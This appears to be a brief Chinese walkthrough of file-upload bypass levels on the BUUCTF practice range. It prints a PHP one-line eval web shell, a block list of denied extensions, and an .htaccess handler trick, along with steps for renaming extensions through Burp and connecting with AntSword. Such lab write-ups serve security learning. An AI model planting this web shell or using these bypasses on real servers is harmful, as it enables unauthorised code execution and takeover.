用的buu的靶场
Pass-01
查看源码发现进行了限制
一句话木马:<?php @eval($_POST['key']);?>
用bp将yjhmm.jpg修改为yjhmm.php然后放包过去
上传地址:http://ca713556-ace3-46a0-be37-2972e851bfa3.node4.buuoj.cn:81/upload/yjhmm.php
然后用蚁剑连接
Pass-02
查看源码对文件类型进行了限制
这里和Pass-01一样将jpg文件的后缀名改成php
Pass-03
查看源码发现是黑名单绕过
将jpg文件的后缀名改成php4
Pass-04
源码进行了限制:
$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf")
<FileMatch"yjhmm.jpg">
SetHandler application/x-httpd-php
创建一个.htaccess的文件
用蚁剑连接成功了